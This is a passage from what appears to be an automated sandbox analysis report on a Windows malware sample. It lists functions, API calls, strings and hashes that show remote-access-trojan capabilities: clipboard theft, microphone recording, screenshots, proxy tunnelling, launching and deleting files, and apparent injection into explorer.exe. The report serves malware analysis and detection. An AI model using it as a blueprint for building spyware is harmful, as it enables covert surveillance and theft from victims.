                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID: !D@$hdF
                                • API String ID: 2172192267-3475379602
                                • Opcode ID: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                • Opcode Fuzzy Hash: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                • __dosmaperr.LIBCMT ref: 0043A937
                                • _free.LIBCMT ref: 0043A943
                                • _free.LIBCMT ref: 0043A94A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: be2abdef093630236b46a14047e2354cdf10b582d669b9bb945715f91254eceb
                                • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                • Opcode Fuzzy Hash: be2abdef093630236b46a14047e2354cdf10b582d669b9bb945715f91254eceb
                                • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419FB4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 176sleeptimeCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00419FB9
                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                • GetLocalTime.KERNEL32(?), ref: 0041A105
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: (x$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                • API String ID: 489098229-3148520567
                                • Opcode ID: 0e7dd5b9c8f3c8bbf87e47502bed00745cf23af802625de92c9b4d39b7d12e2e
                                • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                • Opcode Fuzzy Hash: 0e7dd5b9c8f3c8bbf87e47502bed00745cf23af802625de92c9b4d39b7d12e2e
                                • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                • TranslateMessage.USER32(?), ref: 0040557E
                                • DispatchMessageA.USER32(?), ref: 00405589
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                • Opcode Fuzzy Hash: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: 0VG$0VG$<$@$Temp
                                • API String ID: 1704390241-2575729100
                                • Opcode ID: 98959ef4594bcaafc024db97d5732f010b7230a0abd9b713f16470a190596f9f
                                • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                • Opcode Fuzzy Hash: 98959ef4594bcaafc024db97d5732f010b7230a0abd9b713f16470a190596f9f
                                • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410E61 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                • int.LIBCPMT ref: 00410E81
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID: ,kG$0kG$@!G
                                • API String ID: 3815856325-312998898
                                • Opcode ID: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                • Opcode Fuzzy Hash: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                • Opcode Fuzzy Hash: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00448135
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00448141
                                • _free.LIBCMT ref: 0044814C
                                • _free.LIBCMT ref: 00448157
                                • _free.LIBCMT ref: 00448162
                                • _free.LIBCMT ref: 0044816D
                                • _free.LIBCMT ref: 00448178
                                • _free.LIBCMT ref: 00448183
                                • _free.LIBCMT ref: 0044818E
                                • _free.LIBCMT ref: 0044819C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C68F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
                                • DisplayName, xrefs: 0041C73C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                • API String ID: 1332880857-3614651759
                                • Opcode ID: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                • Opcode Fuzzy Hash: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                • API String ID: 3578746661-3604713145
                                • Opcode ID: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                • Opcode Fuzzy Hash: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                • __fassign.LIBCMT ref: 0044B479
                                • __fassign.LIBCMT ref: 0044B494
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID: PkGNG
                                • API String ID: 1324828854-263838557
                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • Sleep.KERNEL32(00000064), ref: 00417521
                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: f10e294ee6a8c27b1349ad3ce0c7058653f24f1ec6cf567e6a5304385f617d5d
                                • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                • Opcode Fuzzy Hash: f10e294ee6a8c27b1349ad3ce0c7058653f24f1ec6cf567e6a5304385f617d5d
                                • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 004073DD
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\Desktop\1m70ggeepT.exe), ref: 0040749E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CurrentProcess
                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                • API String ID: 2050909247-4242073005
                                • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • _strftime.LIBCMT ref: 00401D50
                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                • API String ID: 3809562944-243156785
                                • Opcode ID: 5d5d8b804b24dbb182b265a24ad27abd29ffba8ef4e2f14911defadce340a58b
                                • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                • Opcode Fuzzy Hash: 5d5d8b804b24dbb182b265a24ad27abd29ffba8ef4e2f14911defadce340a58b
                                • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                • waveInStart.WINMM ref: 00401CFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
